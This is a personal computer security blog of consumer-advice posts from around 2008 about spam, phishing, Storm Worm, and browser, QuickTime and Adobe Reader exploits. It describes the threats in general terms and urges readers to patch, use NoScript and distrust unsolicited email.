Computer Security Weblog

A new twist to on old scam, I had someone report SPAM e-mail that was sent that appeared to come from Microsoft. A quick little research online led me to know this has been around for a few years but it has a different twist.

As you can see, this was the entire body of the e-mail.  Nothing to sell.  No e-cards to click on.  No official document from some bogus US Court.  Just 3 innocent looking links from everyone’s friend Microsoft. The text makes you think you subscribed to MSN Featured Offers and they are being kind enough to add an Unsubscribe link. Since you never really subscribed to this in the first place, they are hoping to get people to click the Unsubscribe link so they won’t have this sent anymore.  All because they respect your privacy. Taking a closer look at the 3 links, they all lead you to the same URL. The IP for the URL was registered in the USA. A quick Google search of the domain showed a lot of Russian language found on references to this domain.  After taking a closer look, all this URL did was to redirect you to a site that was registered in Korea. This gives you a little more insight on how SPAM e-mail can be a threat.  If this trail would have been followed all the way through, exploits for Microsoft, QuickTime, RealPlayer, and possibly Adobe Reader would have run against the PC and if it were not patched, then remote code execution could be possible, meaning the PC would have been added to someone’s criminal botnet and used in nefarious ways.

Remember what we say, never click on unsolicited links or attachments in e-mail.  Stay safe.

Stories last week came out that the folks in Redwood had a closed door meeting with law enforcement. Here is an excerpt about this story.

Botnet fighters have another tool in their arsenal, thanks to the folks at Microsoft. The software vendor is giving law enforcers access to a special tool that keeps tabs on botnets, using data compiled from the 450 million computer users who have installed the Malicious Software Removal tool that ships with Windows. Although Microsoft is reluctant to give out details on its botnet buster — the company said that even revealing its name could give cyber criminals a clue on how to thwart it.

Microsoft company executives discussed it at a closed door conference held for law enforcement professionals Monday. The tool includes data and software that helps law enforcers get a better picture of the data being provided by Microsoft’s users, said Tim Cranton, associate general counsel with Microsoft’s World Wide Internet Safety Programs. “I think of it … as botnet intelligence,” he said.

Kind of cool I thought. But makes one wonder how much information Microsoft is keeping on it’s customers which are the majority of the folks online.

Stay safe and have a great week!!

Hope your weekend has gone well for everyone.  Tonight, I’m blogging about why attackers pick on FaceBook and MySpace users.  Why do you think they do?  Well if your answer is the sheer number of users of FaceBook and MySpace, that will tell you why.  Attackers want to make the biggest bang with their attacks.

Most people who surf the Internet do it with Microsoft’s Internet Explorer (versions 6 or 7).  Attackers are starting to exploit vulnerabilities in several widely installed IE plug-ins to install their malicious software when users are coerced or tricked into visiting one of several Web sites.  That my friends is called social engineering and probably is being done through spam e-mail.

Symantec this past Friday was seeing malicious sites that are running exploits on some Internet Explorer plug-ins in a set of ActiveX controls produced by Aurigma, a tech company who’s image transfer browser plug-in is licensed and distributed by some heavy weight  web portals to help the users upload pictures.  Among these heavy weight sites include FaceBook and MySpace.Symantec warns that if visitors don’t have the Aurigma plug-ins installed, the sites will look for other vulnerable IE plug-ins, including two recently discovered from Yahoo and another for QuickTime that was recently patched by Apple last month.   I go to many sites to gather information for stories and one is Brian Krebs who writes a security blog for the Washington Post.  Click here to read his story on this topic and included in his story is an image of what  the malicious page that people are directed that asks for their login credentials.  If you notice the .cn at the end of the web address  in this picture, the .cn is a country code where the page is hosted.  .CN is for China.  .HK is another one that seems to be host to many  malicious pages.  .HK is Hong Kong.

Well, have a great week.  We are in the last week of February and the weather has to be getting better soon.  Stay safe and we’ll talk again later this week. 

Well just yesterday we got an alert about an Adobe Reader flaw that is being exploited in the wild.  Adobe came out with an updated version of Adobe Reader on Wednesday of this week.  You want to upgrade to version 8.1.2 now.  These exploits have been found in both banner ads and also spam e-mail attachments.  These dirty rotten criminal hacker scoundrels are attacking this application because it is so widely used.  Most people don’t update their version of the Adobe Reader.

If you are a reader of my blog, you know there are tools out there to check to see that you have your software up to date.  The one I really like is the Shavlik Google gadget.  It runs and checks many of these third party applications and tells you that you have an update.  If you use this Google gadget, run it and patch.  The one thing you can do that will protect you the most is to patch your applications.

Patch and be happy.  Stay safe and have a great weekend!!

I wrote about the 94,000 sites that were legitimate sites and had JavaScript added to their pages so that these sites would now direct folks to a couple of servers in China. Not a good deal so I thought how can one defend themselves against this type of attack.

If you’ve been reading my blog, then you know I’m a user of the Firefox browser. I document reasons why it is a safer browser to use. If you haven’t read, look back and find those postings. This injecting of JavaScript is not going to go away so one way of defending yourself is to go and download the NoScript add-on for the Firefox browser. If you are currently a user of Firefox, then click here to install this handy little addon. What it does for you is it allows JavaScript, Java, and other executable content to run only if you allow it. You set up these trusted zones that allow you to run what you want. This is a fantastic tool in your arsenal to fight the bad guys. Install it today and feel better when browsing the Internet.

Stay safe out there and be careful.

Well if you got left off the Storm Worm’s Christmas Card list, maybe you will be lucky to get their Happy New Year e-mail. Like I said, behavior is the BEST weapon you have. So if you didn’t get your Christmas e-mail, and if you are lucky enough to get the Happy New Year version. They want you to download a payload that will run exploits against several vulnerabilities and if you aren’t patched, then you are welcomed in to the Storm’s bot-net. Sometimes they even run against vulnerabilities hat are called zero day which means there are no patches. Stay safe out there and don’t fall for this social engineering tactic.

Hope you all had a great Christmas and have a safe New Year’s celebration.

I assist my church with their computers. In the last 6 months, they purchased a couple of Vista machines. I am new to Vista. At work and home, I’m an XP guy when it comes to Windows OS. Initially, when I looked at tools that were Vista compliant, I found that one of my favorites AVG Anti-Spyware didn’t work. So I went to Spybot Search and Destroy and that worked for me. I figured it would be just a matter of time and AVG would have their spyware removal tool Vista compliant.

Not sure when it happened but it is here. So if you are a Vista user, check out the free version of AVG Spyware Removal software. It helps clean the machine of tracking cookies as well as some nasty malicious software that some run into at times. I saw a forecast that 2008 will probably be a big year for Vista patches. This last patch cycle last Tuesday found that Vista had a bunch of fixes. With more and more people going to Vista, there will be a shift to find vulnerabilities because of the numbers becoming more attractive to the malicious attacker.

Many things will keep you safe on the Internet but your behavior is probably the biggest thing that you can do to protect yourself. It takes many steps so keep reading. I’ll keep you informed as things come up so keep reading and make comments if you would like. I’m getting tired of all nasty spam comments that I just delete. Stay safe and get that Christmas shopping done!

With Christmas right around the corner, it’s a good reminder to talk about Internet Safety.  Spammers work overtime this time of year to try and trick you in to giving up your personal information.  Sometime, spammers can really look authentic.  So I ring the warming bell, to be very careful when going through your e-mail’s Inbox.

And the bad thing is, after Christmas, you will start seeing spam e-mail that appears to be from the IRS.  They’ll tell you track your refund, and all you have to do is give us some really valuable information.  Probably name, address, of course your SSN.  The IRS doesn’t have an e-mail service that tracks and tells you where your refund is.

This is just a reminder that you really need to be vigilant.  Question EVERYTHING that comes via e-mail.  Hey, be vigilant when people on the phone asks you for information.  Create your own “Need to Know” policy.  Protect your information.  It is up to you.  Little things you can do will protect you and keep from being taken advantage of.

OK, now for a little football.  I’m a KC Chiefs fan.  And it has been a REALLY long season.  I think I read it is now 7 loses in a row.  This really is defining that I am a fan.  I don’t jump the band wagon to another team.  I just hope that the KC Chiefs get what they want for Christmas.  Let’s see new offensive line would be nice.  A healthy Larry Johnson.  A new offensive coordinator.  A good YOUNG kicker.  Wow, I hope we’ve been good because our list is long.

Stay safe, and question everything.  Hope your Holiday season is a blessed one.  Talk soon.

Hi. It’s been a few days since my last post. In my part of the world, we had a pretty bad ice storm and power was knocked out and my internet connection was out for a few days. It’s snowing now so I’m really in a Winter Wonderland!

In a previous post, I mentioned that Apple’s QuickTime had a security problem that had no patch. Well late Thursday, Apple released a new version of QuickTime. So if your Apple Updater software hasn’t notified you that there is a new version, just open up QuickTime and you will be notified that there is a new version 7.3.1. Update it now. This is a vulnerability that is going around in the wild. That means that bad people are sending spam e-mail right now with malformed QuickTime files and if they trick you into clicking, they can do bad things. Anytime you hear the words remote code execution associated with a vulnerability, that means the bad people can run their bad programs and do bad stuff to your PC like add keyloggers, steal cookies, steal files, and that should scare you into patching your software. If you are an iTunes person, just grab the iTunes download because QuickTime comes with iTunes.

Just remember as the Holiday season comes in, bad people send many different types of spam e-mails from e-cards to more official things like you’ve changed your password on PayPal, to your financial institution wanting you to click on a link inside and e-mail and have you type your banking credentials so they can steal you blind.

Play it smart. Remember NEVER trust e-mails. Always question before you go and type in account numbers, passwords, pin numbers, etc.. Stay safe and if you are in the middle of the country, drive safely. That is all for now. I’ll try and post another story prior to Monday.

There is a new zero day exploit out there for Apple’s Quicktime application. If you have iTunes downloaded from Apple, then you have Quicktime installed also. The vulnerability is in the RTSP (Real Time Streaming Protocol) in Quicktime. Apple has no patch currently for this vulnerability and has made no public announcement which is standard for Apple. There will be a patch coming from Apple soon so we’ll have to keep an eye out for that.

This is one of those situations where all you have to is go to a website that is hosting a malicious page and you will be attacked. It uses small iframe tag in the HTML code and that redirects the person to the exploit site where the RTSP attack is done, then installs the malicious code on the user’s system.

Symantec who monitors websites serving up this malicious code has found a porn site that is actively serving up this bad stuff. Just as a side note, what a job that must at Symantec who has to monitor that porn site. LOL! Anyway, they also note that this is probably being served up at other sites also.

So let’s repeat ourselves. Don’t surf porn. Don’t use P2P. This may not keep you safe but it will help you avoid this bad stuff. Don’t click on links in unsolicited e-mails and don’t click on attachments in unsolicited e-mails.

Stay safe and have a great rest of the week!